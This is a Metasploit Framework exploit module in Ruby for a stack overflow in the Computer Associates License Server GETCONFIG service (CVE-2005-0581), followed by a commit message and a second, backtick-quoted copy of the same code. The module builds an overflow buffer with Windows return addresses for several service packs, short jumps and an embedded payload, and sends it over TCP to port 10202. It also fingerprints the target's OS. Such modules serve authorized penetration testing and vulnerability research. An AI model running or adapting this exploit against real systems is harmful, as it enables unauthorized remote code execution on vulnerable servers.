metasploit-framework/modules/exploits/windows/license/calicserv_getconfig.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name' => 'Computer Associates License Server GETCONFIG Overflow',
			'Description'	=> %q{
				This module exploits an vulnerability in the CA License Server
				network service. By sending an excessively long GETCONFIG
				packet the stack may be overwritten.
			},
			'Author' => [
					'Thor Doomen <syscall [at] hushmail.com>', # original msf v2 module
					'patrick', # msf v3 port :)
				    ],
			'License' => MSF_LICENSE,
			'Version' => '$Revision$',
			'References'	=>
				[
					[ 'CVE', '2005-0581' ],
					[ 'OSVDB', '14389' ],
					[ 'BID', '12705' ],
					[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213' ],
				],
			'Privileged' => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload' =>
				{
					'Space'	=> 600,
					'BadChars' => "\x00\x20",
					'StackAdjustment' => -3500,

				},
			'Platform'	=> 'win',
			'Targets' =>
				[
					# As much as I would like to return back to the DLL or EXE,
					# all of those modules have a leading NULL in the
					# loaded @ address :(
					# name, jmp esi, writable, jmp edi
					#['Automatic', {} ],
					#
					# patrickw - tested OK Windows XP English SP0-1 only 20100214
					['Windows 2000 English',	{ 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi
					['Windows XP English SP0-1',	{ 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi
					['Windows XP English SP2',	{ 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi
					['Windows 2003 English SP0',	{ 'Rets' => [ 0x71bf175f, 0x7ffde0cc, 0x71bf1a2c ] } ], # ws2help.dll esi + peb + edi
				],
			'DisclosureDate' => 'Mar 02 2005'))

			register_options(
				[
					Opt::RPORT(10202),
				], self.class)
	end
	
	def check
		connect
		banner = sock.get_once
		sock.put("A0 GETCONFIG SELF 0<EOM>")
		res = sock.get_once
		disconnect
		if (res =~ /OS\<([^\>]+)/)
			print_status("CA License Server reports OS: #{$1}")
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect
		banner = sock.get_once
		if (banner !~ /GETCONFIG/)
			print_status("The server did not return the expected greeting!")
		end

		# exploits two different versions at once >:-)
		# 144 -> return address of esi points to string middle
		# 196 -> return address of edi points to string beginning	
		# 148 -> avoid exception by patching with writable address
		# 928 -> seh handler (not useful under XP SP2)
		buff = rand_text_alphanumeric(900)
		buff[142, 2] = Rex::Arch::X86.jmp_short(8) 		# jmp over addresses
		buff[144, 4] = [target['Rets'][0]].pack('V') 		# jmp esi
		buff[148, 4] = [target['Rets'][1]].pack('V')		# writable address
		buff[194, 2] = Rex::Arch::X86.jmp_short(4)		# jmp over address
		buff[196, 4] = [target['Rets'][2]].pack('V')		# jmp edi
		buff[272, payload.encoded.length] = payload.encoded

		sploit = "A0 GETCONFIG SELF #{buff}<EOM>"
		sock.put(sploit)
		
		handler
		disconnect
	end

end

=begin
eTrust: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.2>OLFFILE<0 0 0>SERVER<RMT>VERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINE<PC_686_1_2084>CHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1><EOM>
BrightStor: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
lic98rmt.exe v0.1.0.15: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
=end
Fixed OSVDB refs and added CA Server module. git-svn-id: file:///home/svn/framework3/trunk@8478 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-13 16:16:13 +00:00			`##`
			`# $Id$`
			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/framework/`
			`##`


			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
			`Rank = NormalRanking`

			`include Msf::Exploit::Remote::Tcp`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Computer Associates License Server GETCONFIG Overflow',`
			`'Description' => %q{`
			`This module exploits an vulnerability in the CA License Server`
			`network service. By sending an excessively long GETCONFIG`
			`packet the stack may be overwritten.`
			`},`
			`'Author' => [`
			`'Thor Doomen <syscall [at] hushmail.com>', # original msf v2 module`
			`'patrick', # msf v3 port :)`
			`],`
			`'License' => MSF_LICENSE,`
			`'Version' => '$Revision$',`
			`'References' =>`
			`[`
			`[ 'CVE', '2005-0581' ],`
			`[ 'OSVDB', '14389' ],`
			`[ 'BID', '12705' ],`
			`[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213' ],`
			`],`
			`'Privileged' => true,`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'process',`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 600,`
			`'BadChars' => "\x00\x20",`
			`'StackAdjustment' => -3500,`

			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`# As much as I would like to return back to the DLL or EXE,`
			`# all of those modules have a leading NULL in the`
			`# loaded @ address :(`
			`# name, jmp esi, writable, jmp edi`
			`#['Automatic', {} ],`
			`#`
			`# patrickw - tested OK Windows XP English SP0-1 only 20100214`
			`['Windows 2000 English', { 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi`
			`['Windows XP English SP0-1', { 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi`
			`['Windows XP English SP2', { 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi`
			`['Windows 2003 English SP0', { 'Rets' => [ 0x71bf175f, 0x7ffde0cc, 0x71bf1a2c ] } ], # ws2help.dll esi + peb + edi`
			`],`
			`'DisclosureDate' => 'Mar 02 2005'))`

			`register_options(`
			`[`
			`Opt::RPORT(10202),`
			`], self.class)`
			`end`

			`def check`
			`connect`
			`banner = sock.get_once`
			`sock.put("A0 GETCONFIG SELF 0<EOM>")`
			`res = sock.get_once`
			`disconnect`
			`if (res =~ /OS\<([^\>]+)/)`
			`print_status("CA License Server reports OS: #{$1}")`
			`return Exploit::CheckCode::Detected`
			`end`
			`return Exploit::CheckCode::Safe`
			`end`

			`def exploit`
			`connect`
			`banner = sock.get_once`
			`if (banner !~ /GETCONFIG/)`
			`print_status("The server did not return the expected greeting!")`
			`end`

			`# exploits two different versions at once >:-)`
			`# 144 -> return address of esi points to string middle`
			`# 196 -> return address of edi points to string beginning`
			`# 148 -> avoid exception by patching with writable address`
			`# 928 -> seh handler (not useful under XP SP2)`
			`buff = rand_text_alphanumeric(900)`
			`buff[142, 2] = Rex::Arch::X86.jmp_short(8) # jmp over addresses`
			`buff[144, 4] = [target['Rets'][0]].pack('V') # jmp esi`
			`buff[148, 4] = [target['Rets'][1]].pack('V') # writable address`
			`buff[194, 2] = Rex::Arch::X86.jmp_short(4) # jmp over address`
			`buff[196, 4] = [target['Rets'][2]].pack('V') # jmp edi`
			`buff[272, payload.encoded.length] = payload.encoded`

			`sploit = "A0 GETCONFIG SELF #{buff}<EOM>"`
			`sock.put(sploit)`

			`handler`
			`disconnect`
			`end`

			`end`

			`=begin`
			`eTrust: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.2>OLFFILE<0 0 0>SERVER<RMT>VERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINE<PC_686_1_2084>CHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1><EOM>`
			`BrightStor: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>`
			`lic98rmt.exe v0.1.0.15: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>`
			`=end`